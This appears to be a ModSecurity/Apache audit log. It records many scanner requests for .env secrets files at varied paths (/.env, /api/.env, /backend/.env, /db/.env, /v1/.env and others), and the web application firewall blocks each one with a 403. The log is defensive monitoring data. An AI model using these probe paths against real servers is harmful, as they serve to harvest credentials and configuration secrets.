"%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052552335144 739 (- - -) Stopwatch2: 1746052552335144 739; combined=329, p1=291, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4601d456-Z-- --e1c2c11b-A-- [01/May/2025:05:35:52 +0700] aBKlyOVeTgVPHjrSAYCzygAAAA4 103.236.140.4 60412 103.236.140.4 8181 --e1c2c11b-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --e1c2c11b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c2c11b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052552984273 640 (- - -) Stopwatch2: 1746052552984273 640; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1c2c11b-Z-- --b38ce426-A-- [01/May/2025:07:21:07 +0700] aBK-c-VeTgVPHjrSAYC9AQAAAAQ 103.236.140.4 60430 103.236.140.4 8181 --b38ce426-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Accept-Charset: utf-8 --b38ce426-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b38ce426-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746058867700837 839 (- - -) Stopwatch2: 1746058867700837 839; combined=366, p1=311, p2=0, p3=0, p4=0, p5=55, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b38ce426-Z-- --1af51f16-A-- [01/May/2025:07:50:07 +0700] aBLFP4144kZ4LAGlEgyk4AAAANg 103.236.140.4 38896 103.236.140.4 8181 --1af51f16-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Charset: utf-8 --1af51f16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1af51f16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746060607483660 813 (- - -) Stopwatch2: 1746060607483660 813; combined=331, p1=294, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1af51f16-Z-- --678e803d-A-- [01/May/2025:07:51:01 +0700] aBLFdcVMAgMJpNzaVtJlOAAAAEU 103.236.140.4 39110 103.236.140.4 8181 --678e803d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept-Charset: utf-8 --678e803d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --678e803d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746060661221255 748 (- - -) Stopwatch2: 1746060661221255 748; combined=273, p1=240, p2=0, p3=0, p4=0, p5=33, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --678e803d-Z-- --c8bad145-A-- [01/May/2025:08:02:19 +0700] aBLIG8VMAgMJpNzaVtJmrwAAAEA 103.236.140.4 41730 103.236.140.4 8181 --c8bad145-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) Accept-Charset: utf-8 --c8bad145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8bad145-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746061339469668 930 (- - -) Stopwatch2: 1746061339469668 930; combined=342, p1=288, p2=0, p3=0, p4=0, p5=54, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8bad145-Z-- --62dbfe7e-A-- [01/May/2025:08:06:16 +0700] aBLJCOVeTgVPHjrSAYC_bAAAAAc 103.236.140.4 42640 103.236.140.4 8181 --62dbfe7e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --62dbfe7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62dbfe7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746061576977067 842 (- - -) Stopwatch2: 1746061576977067 842; combined=392, p1=352, p2=0, p3=0, p4=0, p5=40, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62dbfe7e-Z-- --92734324-A-- [01/May/2025:10:01:43 +0700] aBLkF-VeTgVPHjrSAYD7egAAAAs 103.236.140.4 42100 103.236.140.4 8181 --92734324-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.77.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.77.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --92734324-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92734324-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746068503143052 690 (- - -) Stopwatch2: 1746068503143052 690; combined=263, p1=225, p2=0, p3=0, p4=0, p5=38, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92734324-Z-- --4c4ef271-A-- [01/May/2025:10:25:30 +0700] aBLpqigtr0Qsi1mFAsMIUQAAAI0 103.236.140.4 49068 103.236.140.4 8181 --4c4ef271-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4c4ef271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c4ef271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069930537907 839 (- - -) Stopwatch2: 1746069930537907 839; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c4ef271-Z-- --2a0a3802-A-- [01/May/2025:10:25:30 +0700] aBLpqigtr0Qsi1mFAsMIUwAAAIE 103.236.140.4 49086 103.236.140.4 8181 --2a0a3802-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2a0a3802-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a0a3802-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069930737608 563 (- - -) Stopwatch2: 1746069930737608 563; combined=196, p1=174, p2=0, p3=0, p4=0, p5=22, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a0a3802-Z-- --ad074920-A-- [01/May/2025:10:25:30 +0700] aBLpqsVMAgMJpNzaVtKqZAAAAEc 103.236.140.4 49096 103.236.140.4 8181 --ad074920-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ad074920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad074920-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069930937310 772 (- - -) Stopwatch2: 1746069930937310 772; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad074920-Z-- --f607fa5c-A-- [01/May/2025:10:25:31 +0700] aBLpq8VMAgMJpNzaVtKqZQAAAEk 103.236.140.4 49106 103.236.140.4 8181 --f607fa5c-B-- GET /code/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f607fa5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f607fa5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931136965 821 (- - -) Stopwatch2: 1746069931136965 821; combined=343, p1=309, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f607fa5c-Z-- --5ba65174-A-- [01/May/2025:10:25:31 +0700] aBLpq8VMAgMJpNzaVtKqZgAAAEI 103.236.140.4 49116 103.236.140.4 8181 --5ba65174-B-- GET /db/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --5ba65174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ba65174-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931337490 774 (- - -) Stopwatch2: 1746069931337490 774; combined=280, p1=242, p2=0, p3=0, p4=0, p5=38, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ba65174-Z-- --469b3c5e-A-- [01/May/2025:10:25:31 +0700] aBLpqygtr0Qsi1mFAsMIVAAAAI8 103.236.140.4 49126 103.236.140.4 8181 --469b3c5e-B-- GET /login/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --469b3c5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --469b3c5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931536927 865 (- - -) Stopwatch2: 1746069931536927 865; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --469b3c5e-Z-- --d363ff10-A-- [01/May/2025:10:25:31 +0700] aBLpq4144kZ4LAGlEgzxfAAAANM 103.236.140.4 49140 103.236.140.4 8181 --d363ff10-B-- GET /api_v1/go/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --d363ff10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d363ff10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931739050 861 (- - -) Stopwatch2: 1746069931739050 861; combined=353, p1=309, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d363ff10-Z-- --98a93b64-A-- [01/May/2025:10:25:31 +0700] aBLpq4144kZ4LAGlEgzxfwAAAMU 103.236.140.4 49150 103.236.140.4 8181 --98a93b64-B-- GET /api_v1/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --98a93b64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98a93b64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069931939554 799 (- - -) Stopwatch2: 1746069931939554 799; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98a93b64-Z-- --255d3573-A-- [01/May/2025:10:25:32 +0700] aBLprI144kZ4LAGlEgzxgQAAANE 103.236.140.4 49160 103.236.140.4 8181 --255d3573-B-- GET /api_v2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --255d3573-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --255d3573-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069932139893 828 (- - -) Stopwatch2: 1746069932139893 828; combined=276, p1=242, p2=0, p3=0, p4=0, p5=33, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --255d3573-Z-- --8874fe7f-A-- [01/May/2025:10:25:32 +0700] aBLprMVMAgMJpNzaVtKqawAAAE0 103.236.140.4 49170 103.236.140.4 8181 --8874fe7f-B-- GET /api_v2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --8874fe7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8874fe7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069932340054 671 (- - -) Stopwatch2: 1746069932340054 671; combined=263, p1=238, p2=0, p3=0, p4=0, p5=25, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8874fe7f-Z-- --a51c691b-A-- [01/May/2025:10:25:33 +0700] aBLprSgtr0Qsi1mFAsMIVgAAAIY 103.236.140.4 49214 103.236.140.4 8181 --a51c691b-B-- GET /v2/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a51c691b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a51c691b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746069933255655 869 (- - -) Stopwatch2: 1746069933255655 869; combined=362, p1=316, p2=0, p3=0, p4=0, p5=46, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a51c691b-Z-- --af574005-A-- [01/May/2025:10:25:34 +0700] aBLprsVMAgMJpNzaVtKqdwAAAEE 103.236.140.4 49262 103.236.140.4 8181 --af574005-B-- GET /v1/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 164.92.74.66 